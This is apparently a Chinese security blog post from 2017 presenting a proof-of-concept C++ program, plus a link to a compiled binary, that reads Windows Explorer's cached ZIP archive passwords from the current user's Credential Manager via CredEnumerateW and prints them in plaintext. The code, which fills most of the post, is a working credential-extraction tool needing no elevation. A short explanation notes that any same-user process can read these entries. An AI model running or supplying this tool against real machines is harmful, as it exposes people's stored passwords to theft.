
Win8.x/10系统资源管理器ZIP压缩文件缓存密码获取

October 24, 2017 • Security

原理

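资源管理器缓存的 ZIP 压缩文件密码保存在当前用户的凭据管理器(Credential Manager)中,下面的 PoC 用 CredEnumerateW 按 *.zip 过滤,枚举并读出这些条目。以同一用户身份运行的进程都能这样读取,因此这类缓存条目应按明文密码对待。特定环境下可能会用上。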

PoC

源码

#include <Windows.h>
#include <wincred.h>
#include <iostream>

using namespace std;

/*
Credential Manager – Zip archives password retrieval for Win 8.x – Win 10
*/

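/// Enumerates the entries in the calling user's credential set whose target
/// name matches the filter "*.zip" and prints each target name with its blob.
///
/// The call runs in the context of the current user; no elevation is requested.
/// Anything this prints is therefore readable by any process running as that
/// user, which is why these cached entries should be treated as plaintext
/// secrets.
///
/// @return Always 0; failures are reported on the console only.
int main()
{
    // ASCII rule line. The published listing had typographic dashes and curly
    // quotes (blog formatting), which do not compile as C++ string delimiters.
    const wchar_t* const rule = L"------------------------------------------------------";

    PCREDENTIALW* credBuf = nullptr;
    DWORD count = 0;

    // GetLastError() is only meaningful after a failed call, so branch on the
    // BOOL result first instead of reading a possibly stale error code.
    if (!CredEnumerateW(L"*.zip", 0, &count, &credBuf))
    {
        const DWORD err = GetLastError();
        if (err == ERROR_NOT_FOUND)
        {
            std::wcout << std::endl << L"No credentials found in the user's credential set." << std::endl;
        }
        else
        {
            // Any other failure is reported with its code rather than being
            // mislabelled as an allocation failure.
            std::wcout << std::endl << L"CredEnumerateW failed, error " << err << std::endl;
        }
    }
    else if (credBuf)
    {
        for (DWORD i = 0; i < count; ++i)
        {
            const CREDENTIALW* cred = credBuf[i];
            if (!cred || !cred->CredentialBlob || !cred->TargetName)
            {
                continue;
            }

            // CredentialBlob is a byte buffer of CredentialBlobSize bytes and is
            // not guaranteed to be NUL-terminated; printing it as a C string can
            // read past the end. Bound the output by the reported size instead.
            // NOTE(review): assumes the blob holds UTF-16 text, as the original
            // cast did; confirm for other entry types.
            const wchar_t* secret = reinterpret_cast<const wchar_t*>(cred->CredentialBlob);
            std::streamsize secretLen =
                static_cast<std::streamsize>(cred->CredentialBlobSize / sizeof(wchar_t));
            while (secretLen > 0 && secret[secretLen - 1] == L'\0')
            {
                --secretLen;  // drop a stored terminator, if any
            }

            std::wcout << std::endl << rule << std::endl;
            std::wcout << L"Target: " << cred->TargetName << std::endl << std::endl;
            std::wcout << L"Password: ";
            std::wcout.write(secret, secretLen);
            std::wcout << std::endl;
            std::wcout << rule << std::endl << std::endl;
        }
    }

    // Single cleanup path replaces the goto/label pair; the old label name
    // (leading double underscore) is a reserved identifier.
    if (credBuf)
    {
        CredFree(credBuf);
        credBuf = nullptr;
    }

    // Keep the console window open until a key is pressed.
    std::cin.get();
    return 0;
}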

编译好的文件

CredMan_ZipPassExtractor.zip

ZipPassExtractor-1.png
